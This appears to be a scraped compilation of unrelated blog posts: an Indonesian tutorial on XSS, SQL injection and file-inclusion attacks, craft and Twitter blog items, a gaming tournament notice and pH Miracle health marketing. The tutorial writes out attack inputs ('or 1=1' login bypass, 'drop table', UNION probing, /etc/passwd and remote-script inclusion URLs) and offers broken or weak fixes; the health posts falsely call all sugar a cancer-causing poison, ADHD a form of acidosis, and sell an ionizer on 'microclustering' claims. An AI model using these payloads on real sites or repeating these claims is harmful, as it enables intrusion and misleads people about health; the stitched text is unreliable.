Blacklists, Clustering and The Matrix

Blacklists are the mainstay of many security technologies protecting enterprise networks today. Despite being used practically everywhere however, many people fail to understand what blacklists actually offer in the realm of protection - and how they're often used as a preemptive protection technology.

Add to that a complementary technology - one offering more advanced features in the realm of preemptive threat detection (and perhaps "protection") and used to aid and extend blacklists - is that of clustering.

To help explain these technological terms (and whats happening in this field of preemptive technology) I wrote a couple of technical blogs that were published in SC Magazine this week. With a bit of luck you'll find them educational and a bit of fun.

Part One: Blacklists, clustering and The Matrix

Part Two: Blacklists, clustering and The Matrix

Stumble Upon Button

Add this to your blog today!

---

This little stumble upon button will really help boost your stumbles! Its the little button at the foot of this post with the numbers. I'm in the middle of writing an article for the Folksy Blog all about stumbling and why its so great for boosting traffic.   I had to take a little break to share this!

It shows a live count of the number of stumblers that have visited your site - I added it about an hour ago and I'm loving seeing the numbers leap up.  Apparently the first 15 are just robots (friendly ones!) It's easy to add the code, you just need to amend one tiny bit of html in your template.  Follow the instructions here to add the code  and get your own stumble button. Just go into your dashboard click Design / Html and use Ctrl + F to find the piece of code to change. (Leave me a comment if you get stuck and I'll help you)

Don't forget to stumble Craft Blog UK!

---

Protecting Website from Common Attacks

------------------------------------------------------/

[-] Title : Protecting website from common attacks

[-] Date : 08-08-2010

[-] Author : vYc0d

[-] Contact : vyc0d@hackermail.com

[-] Web : http://vyc0d.blogspot.com

[-] Language : Indonesian

------------------------------------------------------/



Konten :

[1] Pendahuluan

[2] Cross Site Scripting

[3] SQL Injection

\_ Login Form Bypassing

\_ UNION SQL Injection

[4] File Inclusion

[5] Special Thanks



[1] Pendahuluan



Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan

di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini

adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman

yang memungkinkan attacker untuk dapat menyusup ke dalam website.







[2] Cross Site Scripting



Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman

web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker

kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna

dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.



Example:

http://www.situs.net/find.php?all=">



*Solusi (javascript) :



function RemoveBad(strTemp) {

strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");

return strTemp;

}

[3] SQL Injection



*\_ Login Form Bypassing



Berikut adalah contoh kode yang dapat kita bisa bypass:



index.html file:

Password:

login.php file:


// Contoh Kode

$execute = "SELECT * from database WHERE password = '{$_POST['pass'])";

$result = mysql_query($execute);

?>

Kita dapat bypass dengan menggunakan ' or '1=1', dan menjalankan "password = ''or '1=1'';".

Atau attacker dapat juga dapat menghapus database dengan menjalankan "' drop table database; --".



*Solusi :



Menggunakan mysql_real_escape_string



Contoh:

$badcode = "' OR 1 '";

$badcode = mysql_real_escape_string($badcode);

$message = "SELECT * from database WHERE password = "'$badcode'";

echo "what are doing nobs" . $message . ";

?>

*\_ Union SQL Injection



Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya

di akhir url "sebuah php?.id=". Jika terdapat error MySQL, situs tersebut kemungkinan besar

besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,

dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.



Contoh :

http://www.situs.net/index.php?id=1'

salah satu contoh pesan error:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in.....



Setelah muncul pesan error,maka attacker melanjutkan aksinya ;))

http://www.situs.net/index.php?id=1 ORDER BY 1-- <-- No error.

http://www.situs.net/index.php?id=1 ORDER BY 2-- <-- Muncul pesan error. Ini berarti hanya ada satu kolom

http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()-- <-- Memilih semua kolom dan menjalankan

perintah version().



*Solusi :



Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:

$bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";

$patch = eregi_replace($bug, "", $patch);

[4] File Inclusion



\_ Remote File Inclusion dan Local File Inclusion



Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.

Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server

dengan hanya melalui URL.



Contoh kode yang vulnerable :

include($_GET['page']);

?>

Beberapa contoh serangan :

http://www.situs.net/page.php?page=../../../../../etc/passwd < contoh LFI

http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt? < contoh RFI



*Solusi :

Validate the input.

$page = $_GET['page'];

$allowed = array('index.php', 'games.php' 'ip.php');

$iplogger = ('ip.php');

if (in_array $page, $pages)) {

include $page {

else

{

include $iplogger

die("IP logged.");

}

[5] Special Thanks



[-] Allah SWT, Muhammad SAW

[-] The big Family of :

[-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew

[-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie

[-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)



Mirror : http://www.exploit-db.com/papers/14577/

Alienware Cross Fire National Tournament 2010

Setelah resmi meluncurkan produk terbaru Alienware, yang sangat fenomenal di kalangan gamers, Dell Indonesia pun menggelar sebuah kompetisi game online �Alienware Cross Fire National Tournament 2010�.

Sejak bulan Februari 2010, Alienware telah berada di 15 kota besar Indonesia untuk memulai kompetisi game mutakhir level Internasional. Tak tanggung-tanggung misi Dell dalam mendukung komunitas game Indonesia, membuahkan hasil yang sangat mengejutkan.

Sebanyak 180 team bertarung adu ketangkasan, kecepatan dan kepintaran menjatuhkan lawan di game Cross Fire. Akhirnya, sebanyak 4 team terbaik berhasil menaklukan peserta lainnya dan memulai babak final, untuk memperebutkan Alienware M11X yang sangat menggiurkan.

Babak final yang diadakan mulai tanggal 6 hingga 8 Agustus 2010 di Mal Pluit Junction � Jakarta, akan menentukan team mana yang berhak mendapatkan posisi jawara. Pemenang dari kompetisi ini selain mendapatkan produk Alienware M11X, juga mendapatkan full sponsorship dan full akomodasi untuk megikuti berbagai kompetisi game di tingkat nasional, regional dan internasional sepanjang tahun 2010.


�Melalui kompetisi yang seru ini, bukan saja menarik bagi para hard core gamer, tetapi orang lain pun bisa menikmati pengalaman paling inovatif Alienware dalam sebuah tampilan HD dengan kinerja grafis tinggi, secara otomatis mengembangkan pengalaman visual yang menakjubkan di mana pun mereka berada,� ujar Willy Hendrajudo, Marketing Manager Dell Consumer Business Indonesia.

Great New feature from Twitter! Who to follow???

Who to follow on Twitter???

---

 
Exciting new stuff to help you find exactly who to follow on twitter - and it's actually from twitter this time...

"With more than a hundred million users on Twitter, there are sure to be at least dozens of accounts out there that will reflect your interests. The trouble is finding all of them. Today we're beginning to roll out a simple, but powerful new feature to help address that -- "Suggestions for You". The algorithms in this feature, built by our user relevance team, suggest people you don�t currently follow that you may find interesting. The suggestions are based on several factors, including people you follow and the people they follow. You'll see these suggestions on Twitter.com and the Find People section. If you like a suggestion, click "follow"; if you don't, click "hide," and we�ll try not to suggest that user again." (Twitter Blog)

So I signed out of tweet deck to take a look! Apparently they are launching an API so that third parties can add this too - so I don't have to spend too long away from tweet deck, I'm guessing there'll be a new release out soon - yet another column...

It's really just like the little friend suggestion boxes that facebook have.

---

The Best Water Ionizer for Alkaline Electron Rich Water?

As you may know the Japanese, Taiwanese and Koreans have been studying ionized electron rich water for decades. Because of research studies and lab reports not translated into english, most Americans miss out on documented proof validating the efficacy of our pH Miracle Mark I ionizer.

We just received a translated lab report showing we truly have the best water ionizer in the market that creates the wettest water or microclustered water.

All water ionizer brands claim their water is microclustered. Please DO NOT fall for this "teabag demonstration!" It is not anywhere near an acurate way to prove microclustering.

The main way to test microclustering is with an NMRI test which costs upwards of $70,000.00!

We have done this NMRI multiple times!

Our lastest tests have shown the following:

Tap water from Nagasaki, Japan, measured at 105 hertz. Translated this means the molecular structure is approximately 16 -18 water molecules per cluster. This would be the same as ALL bottled waters being sold on the US and International market.

The pH Miracle Mark I ionizer at 9.5 PH setting measured at 47 hertz. Translated this means the molecule structure is approximately 6-8 molecules per cluster.

For those who are new to the term "Microclustering" it is simply a smaller water molecule that can better penetrate and hydrate the cells. Microclustering is easily 1/3 of the power and effectiveness of the pH Miracle Mark I ionized water. Microclustering will help minerals and other alkalizing supplements adsorb and absorb quickly and more efficiently.

If you are thinking of purchasing a water ionizer then purchase the best - The pH Miracle Mark I ionizer.

To order your water ionizer today go to:

http://www.phmiracleliving.com/p-463-ph-miracle-mark-i-ionizer.aspx

Dr. Young's Research Validated - Fruit Sugars Cause Pancreatic Cancer

I have been sharing my research for over 30 years that sugar causes cancer and that high sugar fructose from fruits, including corn causes cancer. Corn and corn sugar is one of my top ten foods never to eat - and corn syrup is in many foods and drinks. Are you listening?

Sugar is an acid and causes cancer! All sugars including agave, stevia, maple syrup, cane sugar, corn syrup, fructose, glucose, destrose, sucrose, and all artificial sweetners as well are acidic and toxic to the human or animal body.

Sugar is a drug. Sugar is an acid. Sugar is a neurotoxin. Sugar is a posion. Sugar is a metabolic waste product. Sugar is a metabolite of cellular degeneration. If you eat sugar in any form it will make you sick, tired and fat and eventually kill you.




Finally my reserach has been validated. Sugar/fructose from fruit causes pancreatic cancer.

There is no such thing as an alkaline sweeter. They are all acidic and toxic to the body.

There is sugar in every food which comes from the fermentation or breakdown of that food. Sugar is the urine of fermentation. Stop eating it now if you are truly in...



WASHINGTON � Pancreatic tumor cells use fructose to divide and proliferate, U.S. researchers said on Monday in a study that challenges the common wisdom that all sugars are the same.
Tumor cells fed both glucose and fructose used the two sugars in two different ways, the team at the University of California Los Angeles found.



They said their finding, published in the journal Cancer Research, may help explain other studies that have linked fructose intake with pancreatic cancer, one of the deadliest cancer types.
"These findings show that cancer cells can readily metabolize fructose to increase proliferation," Dr. Anthony Heaney of UCLA's Jonsson Cancer Center and colleagues wrote.



"They have major significance for cancer patients given dietary refined fructose consumption, and indicate that efforts to reduce refined fructose intake or inhibit fructose-mediated actions may disrupt cancer growth."



Americans take in large amounts of fructose, mainly in high fructose corn syrup, a mix of fructose and glucose that is used in soft drinks, bread and a range of other foods.



Politicians, regulators, health experts and the industry have debated whether high fructose corn syrup and other ingredients have been helping make Americans fatter and less healthy.



Too much sugar of any kind not only adds pounds, but is also a key culprit in diabetes, heart disease and stroke, according to the American Heart Association.



Several states, including New York and California, have weighed a tax on sweetened soft drinks to defray the cost of treating obesity-related diseases such as heart disease, diabetes and cancer.

The American Beverage Association, whose members include Coca-Cola and Kraft Foods have strongly, and successfully, opposed efforts to tax soda.



The industry has also argued that sugar is sugar.



Heaney said his team found otherwise. They grew pancreatic cancer cells in lab dishes and fed them both glucose and fructose.



Tumor cells thrive on sugar but they used the fructose to proliferate. "Importantly, fructose and glucose metabolism are quite different," Heaney's team wrote.



"I think this paper has a lot of public health implications. Hopefully, at the federal level there will be some effort to step back on the amount of high fructose corn syrup in our diets," Heaney said in a statement.



Now the team hopes to develop a drug that might stop tumor cells from making use of fructose.



U.S. consumption of high fructose corn syrup went up 1,000 percent between 1970 and 1990, researchers reported in 2004 in the American Journal of Clinical Nutrition.

An Acid Western Diet Linked To ADHD

A new study from Perth's Telethon Institute for Child Health Research shows an association between ADHD and an acidic Western-style' diet in adolescents.

The research findings have just been published online in the international Journal of Attention Disorders.

Leader of Nutrition studies at the Institute, Associate Professor Wendy Oddy, said the study examined the dietary patterns of 1800 adolescents from the long-term Raine Study and classified diets into 'Healthy' or 'Western' or 'Acid' patterns.

�We found a diet high in the Western pattern of foods was associated with more than double the risk of having an ADHD diagnosis compared with a diet low in the Western pattern, after adjusting for numerous other social and family influences,� Dr Oddy said.

�We looked at the dietary patterns amongst the adolescents and compared the diet information against whether or not the adolescent had received a diagnosis of ADHD by the age of 14 years. In our study, 115 adolescents had been diagnosed with ADHD, 91 boys and 24 girls.� A �healthy� pattern is a diet high in fresh fruit and vegetables, whole grains and fish. It tends to be higher in omega-3 fatty acids, folate and fibre. A �Western� pattern is a diet with a trend towards takeaway foods, confectionary, processed, fried and refined foods. These diets tend to be higher in total fat, saturated fat, refined sugar and sodium.

�When we looked at specific foods, having an ADHD diagnosis was associated with a diet high in takeaway foods, processed meats, red meat, high fat dairy products and confectionary,� Dr Oddy said.

�We suggest that a Western dietary pattern may indicate the adolescent has a less optimal fatty acid profile, whereas a diet higher in omega-3 fatty acids is thought to hold benefits for mental health and optimal brain function.

�It also may be that the Western dietary pattern doesn't provide enough essential micronutrients that are needed for brain function, particularly attention and concentration, or that a Western diet might contain more colours, flavours and additives that have been linked to an increase in ADHD symptoms. It may also be that impulsivity, which is a characteristic of ADHD, leads to poor dietary choices such as quick snacks when hungry.�

Dr Oddy said that whilst this study suggests that diet may be implicated in ADHD, more research is needed to determine the nature of the relationship.

�This is a cross-sectional study so we cannot be sure whether a poor diet leads to ADHD or whether ADHD leads to poor dietary choices and cravings,� Dr Oddy said.

ADHD is the most commonly diagnosed childhood mental health disorder and has a prevalence of approximately 5%. ADHD is known to be more common in boys.

According to Dr. Robert O. Young, Director of Research at the pH Miracle Living Center, "ADHD is a classic condition of tissue acidosis, low urine pH and bowel constipation due to the ingestion of highly acidic foods, such as beef, chicken, pork, eggs and dairy."

Resources:

Western diet link to ADHD

http://www.articlesofhealth.blogspot.com/

http://www.phmiracleliving.com/